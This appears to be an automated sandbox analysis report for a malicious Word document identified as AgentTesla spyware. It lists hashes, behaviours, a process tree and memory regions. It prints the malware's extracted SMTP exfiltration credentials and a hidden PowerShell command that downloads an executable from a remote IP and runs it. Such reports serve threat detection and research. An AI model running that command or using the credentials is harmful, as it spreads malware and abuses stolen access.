Overview

overview

10

Static

static

8

IMG_057_163_22.doc

windows7_x64

10

IMG_057_163_22.doc

windows10_x64

1

Analysis

  • max time kernel
    123s
  • max time network
    22s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    11-05-2021 05:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IMG_057_163_22.doc

  • Size

    183KB

  • MD5

    49ad6fb2dca5d329f6c458ebb172f35f

  • SHA1

    814e7ee66ade2d0b7eeca2f4c655709939b31ac9

  • SHA256

    69ac0d42dce05bcd01273fc11a1a73fa7d6ab446ef129677940a328aa8f1e4d2

  • SHA512

    310e428d16cbb69d2e48c18193716481e5db09c985438bbe1049140a3ff4c5c77aa5ffd83f9343784ee9bb5be7b572e565f04c0c1109b59cae6923976a2a35dd

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    sixjan.club
  • Port:
    587
  • Username:
    andle@sixjan.club
  • Password:
    j&2^(}d4gD}u

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • AgentTesla Payload 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 5 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 5 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\IMG_057_163_22.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1612
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1940
    • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
      "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
      1⤵
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -w Hidden Invoke-WebRequest -Uri "http://31.210.20.6/w2/fgmq.exe" -OutFile "C:\Users\Public\Documents\nationalartist.exe";C:\Users\Public\Documents\nationalartist.exe
        2⤵
        • Blocklisted process makes network request
        • Loads dropped DLL
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Users\Public\Documents\nationalartist.exe
          "C:\Users\Public\Documents\nationalartist.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1176
          • C:\Users\Admin\AppData\Local\Temp\nationalartist.exe
            C:\Users\Admin\AppData\Local\Temp\nationalartist.exe
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:684

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • C:\Users\Admin\AppData\Local\Temp\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • C:\Users\Public\Documents\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • C:\Users\Public\Documents\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • \Users\Admin\AppData\Local\Temp\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • \Users\Public\Documents\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • \Users\Public\Documents\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • \Users\Public\Documents\nationalartist.exe
      MD5

      355160860209999220faf31b76ba7a80

      SHA1

      cf78e87db6597bdefc57cb7892e563f0eaad3b5d

      SHA256

      19368f9d401db77bd90b14b17b435c319e7fefb557920323d5ed954057d53e76

      SHA512

      f60aaef5f172aeec75ad65c07b6b2d94c81c2c7325ba76b3cfe08ff6ea54684c9bcf70f2e556840a3620a2dd96e3f26aeb912fb358ce37ef368de7852749c213

      Download Submit
    • memory/684-112-0x0000000004B70000-0x0000000004B71000-memory.dmp
      Filesize

      4KB

      Download
    • memory/684-110-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/684-107-0x000000000043761E-mapping.dmp
      Download
    • memory/684-106-0x0000000000400000-0x000000000043C000-memory.dmp
      Filesize

      240KB

      Download
    • memory/1176-101-0x00000000048D0000-0x000000000495A000-memory.dmp
      Filesize

      552KB

      Download
    • memory/1176-96-0x0000000000C10000-0x0000000000C11000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1176-102-0x0000000004D40000-0x0000000004D91000-memory.dmp
      Filesize

      324KB

      Download
    • memory/1176-92-0x0000000000000000-mapping.dmp
      Download
    • memory/1176-98-0x0000000000600000-0x0000000000601000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1612-113-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1612-60-0x0000000070261000-0x0000000070263000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1612-61-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

      Download
    • memory/1612-59-0x00000000727E1000-0x00000000727E4000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1792-66-0x0000000000940000-0x0000000000941000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-80-0x0000000006240000-0x0000000006241000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-70-0x0000000002590000-0x0000000002591000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-71-0x0000000004950000-0x0000000004951000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-81-0x0000000006370000-0x0000000006371000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-88-0x0000000006460000-0x0000000006461000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-74-0x0000000005830000-0x0000000005831000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-79-0x000000007EF20000-0x000000007EF21000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-68-0x0000000004A60000-0x0000000004A61000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-67-0x0000000004AA0000-0x0000000004AA1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-69-0x0000000004A62000-0x0000000004A63000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1792-65-0x0000000075D51000-0x0000000075D53000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1792-64-0x0000000000000000-mapping.dmp
      Download
    • memory/1792-89-0x0000000006530000-0x0000000006531000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1940-100-0x000007FEFBC31000-0x000007FEFBC33000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1940-99-0x0000000000000000-mapping.dmp
      Download